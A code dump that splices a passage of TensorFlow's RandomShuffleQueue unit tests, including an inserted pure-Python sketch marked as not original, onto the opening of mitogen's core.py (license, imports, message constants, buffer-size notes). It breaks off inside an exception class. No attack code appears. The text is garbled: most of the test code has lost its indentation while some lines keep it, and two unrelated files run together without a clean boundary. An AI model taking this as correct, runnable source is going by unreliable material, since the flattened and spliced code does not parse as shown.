# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
def blocking_dequeue():
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
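  def testMinAfterDequeueIllustrativeSketch(self):
    # Illustrative sketch (added; not an original TensorFlow test): a pure-
    # Python model of the min_after_dequeue semantics exercised above.
    # Dequeue blocks while it would leave fewer than min_after_dequeue
    # elements behind, and closing the queue lifts that requirement.
    import collections
    import threading
    cond = threading.Condition()
    state = {"items": collections.deque([10.0, 20.0, 30.0]), "closed": False}
    min_after_dequeue = 2

    def dequeue():
      with cond:
        while (not state["closed"] and
               len(state["items"]) - 1 < min_after_dequeue):
          cond.wait()
        return state["items"].popleft()

    results = [dequeue()]  # 3 -> 2 elements: exactly the minimum, allowed

    def drain():
      results.append(dequeue())
      results.append(dequeue())

    drain_thread = threading.Thread(target=drain)
    drain_thread.start()
    time.sleep(0.1)
    self.assertEqual(len(results), 1)  # blocked at the min_after_dequeue bound
    with cond:
      state["closed"] = True  # closing lifts the minimum, like close_op above
      cond.notify_all()
    drain_thread.join()
    self.assertItemsEqual([10.0, 20.0, 30.0], results)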
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
        self.assertEqual(3, len(results))
        results.extend(sess.run(dequeued_t))
        self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
        self.assertEqual(3, len(results))
        # min_after_dequeue is 2, we ask for 3 elements, and we end up only
        # getting the remaining 1.
        results.extend(sess.run(dequeued_t))
        self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
        # While the last dequeue failed, we want to ensure that it returns
        # any elements that it potentially reserved to dequeue. Thus the
        # next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The blocking_enqueue_op has enqueued 1 of its 2 elements, and is now
# blocked waiting for one more element to be dequeued.
for i in range(50):
queue_size = self.evaluate(size_t)
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
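# (The poll above waits up to 50 * 0.1 = 5 seconds for the queue to reach
# its capacity of 4, which signals that the first of the two blocked
# elements has been accepted.)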
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If neither the graph seed nor the op seed is provided, the default value
# must be used, and if a shared queue has already been created, the second
# queue op must accept whatever seed value the first one used.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
core.py | # Copyright 2017, David Wilson
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
This module implements most package functionality, but remains separate from
non-essential code in order to reduce its size, since it also serves as the
bootstrap implementation sent to every new slave context.
"""
import collections
import encodings.latin_1
import errno
import fcntl
import imp
import itertools
import logging
import os
import signal
import socket
import struct
import sys
import threading
import time
import traceback
import warnings
import weakref
import zlib
# Absolute imports for <2.5.
select = __import__('select')
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from cStringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
# TODO: usage of 'import' after setting __name__, but before fixing up
# sys.modules generates a warning. This happens when profiling = True.
warnings.filterwarnings('ignore',
"Parent module 'mitogen' not found while handling absolute import")
LOG = logging.getLogger('mitogen')
IOLOG = logging.getLogger('mitogen.io')
IOLOG.setLevel(logging.INFO)
LATIN1_CODEC = encodings.latin_1.Codec()
_v = False
_vv = False
GET_MODULE = 100
CALL_FUNCTION = 101
FORWARD_LOG = 102
ADD_ROUTE = 103
DEL_ROUTE = 104
ALLOCATE_ID = 105
SHUTDOWN = 106
LOAD_MODULE = 107
FORWARD_MODULE = 108
DETACHING = 109
CALL_SERVICE = 110
IS_DEAD = 999
try:
BaseException
except NameError:
BaseException = Exception
PY3 = sys.version_info > (3,)
if PY3:
b = str.encode
BytesType = bytes
UnicodeType = str
FsPathTypes = (str,)
BufferType = lambda buf, start: memoryview(buf)[start:]
long = int
else:
b = str
BytesType = str
FsPathTypes = (str, unicode)
BufferType = buffer
UnicodeType = unicode
AnyTextType = (BytesType, UnicodeType)
if sys.version_info < (2, 5):
next = lambda it: it.next()
#: Default size for calls to :meth:`Side.read` or :meth:`Side.write`, and the
#: size of buffers configured by :func:`mitogen.parent.create_socketpair`. This
#: value has many performance implications; 128KiB seems to be a sweet spot.
#:
#: * When set low, large messages cause many :class:`Broker` IO loop
#: iterations, burning CPU and reducing throughput.
#: * When set high, excessive RAM is reserved by the OS for socket buffers (2x
#: per child), and an identically sized temporary userspace buffer is
#: allocated on each read that requires zeroing, and over a particular size
#: may require two system calls to allocate/deallocate.
#:
#: Care must be taken to ensure the underlying kernel object and receiving
#: program support the desired size. For example,
#:
#: * Most UNIXes have TTYs with fixed 2KiB-4KiB buffers, making them unsuitable
#: for efficient IO.
#: * Different UNIXes have varying presets for pipes, which may not be
#: configurable. On recent Linux the default pipe buffer size is 64KiB, but
#: under memory pressure may be as low as 4KiB for unprivileged processes.
#: * When communication is via an intermediary process, its internal buffers
#: affect the speed at which OS buffers drain. For example OpenSSH uses 64KiB
#: reads.
#:
#: An ideal :class:`Message` has a size that is a multiple of
#: :data:`CHUNK_SIZE` inclusive of headers, to avoid wasting IO loop iterations
#: writing small trailer chunks.
CHUNK_SIZE = 131072
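# Illustrative arithmetic: the stream header packed by Stream._send() below
# is 24 bytes, so a pickled payload of 131072 - 24 = 131048 bytes fills
# exactly one chunk, avoiding a small trailer write on the IO loop.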
_tls = threading.local()
if __name__ == 'mitogen.core':
# When loaded using import mechanism, ExternalContext.main() will not have
# a chance to set the synthetic mitogen global, so just import it here.
import mitogen
else:
# When loaded as __main__, ensure classes and functions gain a __module__
# attribute consistent with the host process, so that pickling succeeds.
__name__ = 'mitogen.core'
class Error(Exception):
"""Base for all exceptions raised by Mitogen.
:param str fmt:
Exception text, or format string if `args` is non-empty.
:param tuple args:
Format string arguments.
"""
def __init__(self, fmt=None, *args):
if args:
fmt %= args
if fmt and not isinstance(fmt, UnicodeType):
fmt = fmt.decode('utf-8')
Exception.__init__(self, fmt)
class LatchError(Error):
